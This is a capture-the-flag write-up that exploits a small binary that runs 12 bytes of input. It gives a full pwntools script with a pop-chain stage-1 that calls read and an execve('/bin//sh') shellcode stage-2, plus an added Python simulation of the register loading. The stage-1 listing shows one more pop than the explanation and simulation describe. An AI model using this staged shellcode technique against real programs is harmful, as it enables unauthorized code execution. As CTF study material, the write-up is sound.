Open it in IDA.
The program only copies the first 12 bytes of the input into a virtual address and then executes them. That is too small for a full shellcode, so the only option is a stage-1 of pop instructions that loads the registers for a read call, then send the get-shell shellcode as the second stage.
Full exploit:
from pwn import *
context(log_level='debug', arch='amd64')
p = process('./interm')
# Stage 1: 11 bytes, fits in the 12 bytes the binary copies and executes.
# The first five pops eat whatever is already on the stack; the last four
# load rdi/rsi/rdx/rax from the qwords appended after the shellcode,
# giving read(0, 0x114514022, 0x100).
shellcode = '''
pop rdi
pop rdi
pop rax
pop rdi
pop rdi
pop rdi
pop rsi
pop rdx
pop rax
syscall
'''
shellcode = asm(shellcode)
print(len(shellcode))
# Pad the code to 16 bytes, then the four qwords consumed by the last four pops.
payload = shellcode.ljust(0x10, b'\x00') + p64(0) + p64(0x114514022) + p64(0x100) + p64(0)
p.sendafter(b'show your magic:', payload)
# Stage 2: read by stage 1 into 0x114514022, execve("/bin//sh", NULL, NULL).
shellcode = '''
xor rdx,rdx
xor rsi,rsi
push rsi
mov rdi,0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov rax,59
syscall
'''
shellcode = asm(shellcode)
p.sendline(shellcode)
p.interactive()
This approach is borrowed from other players' write-ups.
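Added example, not part of the original write-up: a pwntools-free check of the reasoning above. It encodes the stage-1 pops with the standard single-byte x86-64 POP opcodes, confirms the code fits in the 12-byte copy limit, simulates which stack qword lands in which register, and decodes the string constant used in stage 2. The number of qwords already on the stack before the appended values (five) is an assumption inferred from the pop count, not something the write-up states.

```python
import struct

# Standard x86-64 encodings: single-byte POP r64 and the two-byte SYSCALL.
POP_OPCODES = {"rax": 0x58, "rdx": 0x5a, "rsi": 0x5e, "rdi": 0x5f}
SYSCALL = b"\x0f\x05"

# Linux x86-64 syscall numbers used by the two stages.
SYSCALL_NAMES = {0: "read", 59: "execve"}

# Stage-1 pop sequence from the write-up, in order.
STAGE1 = ["rdi", "rdi", "rax", "rdi", "rdi", "rdi", "rsi", "rdx", "rax"]
COPY_LIMIT = 12  # bytes the binary copies before jumping, per the write-up

# Qwords appended after the padded shellcode in the payload.
APPENDED = [0, 0x114514022, 0x100, 0]

# Assumption: five qwords sit between rsp at entry and the appended values
# (9 pops minus 4 appended qwords). Their contents do not matter.
ASSUMED_JUNK = [0xdeadbeef] * (len(STAGE1) - len(APPENDED))


def assemble_pops(regs):
    """Encode a list of POP targets followed by SYSCALL."""
    return bytes(POP_OPCODES[r] for r in regs) + SYSCALL


def fits_in_limit(code, limit=COPY_LIMIT):
    """True if the stage-1 code survives the 12-byte copy intact."""
    return len(code) <= limit


def register_state(regs, junk_qwords, appended_qwords):
    """Simulate the pops: each pop takes the next qword from the stack.

    The stack is modelled as the pre-existing (junk) qwords followed by the
    attacker-appended qwords; later pops to the same register overwrite
    earlier ones, so only the final value per register survives.
    """
    stack = list(junk_qwords) + list(appended_qwords)
    state = {}
    for r in regs:
        state[r] = stack.pop(0)
    return state


def syscall_name(state):
    """Name of the syscall that the final rax value selects."""
    return SYSCALL_NAMES.get(state["rax"], "unknown")


def decode_string_constant(value):
    """Decode a 64-bit immediate back into the 8-byte string it pushes."""
    return struct.pack("<Q", value).decode()


if __name__ == "__main__":
    code = assemble_pops(STAGE1)
    print(len(code), "bytes, fits:", fits_in_limit(code))
    state = register_state(STAGE1, ASSUMED_JUNK, APPENDED)
    print({k: hex(v) for k, v in state.items()}, "->", syscall_name(state))
    print(decode_string_constant(0x68732f2f6e69622f))
```

Running it shows why the author pads to 0x10 rather than 12: the code is 11 bytes, so one padding byte lands inside the copied region and the remaining five only serve to align the appended qwords.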